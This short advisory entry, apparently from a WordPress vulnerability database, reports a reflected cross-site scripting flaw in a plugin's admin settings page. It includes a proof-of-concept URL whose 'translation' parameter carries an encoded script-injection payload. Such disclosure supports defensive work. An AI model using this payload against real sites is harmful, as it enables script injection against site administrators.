The plugin does not sanitise and escape the translation parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting
https://example.com/wp-admin/options-general.php?page=akismet_privacy_notice_settings_group&translation=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E
Krzysztof Zając
Krzysztof Zając
Yes
2022-03-07 (about 10 months ago)
2022-03-07 (about 10 months ago)
2022-04-09 (about 9 months ago)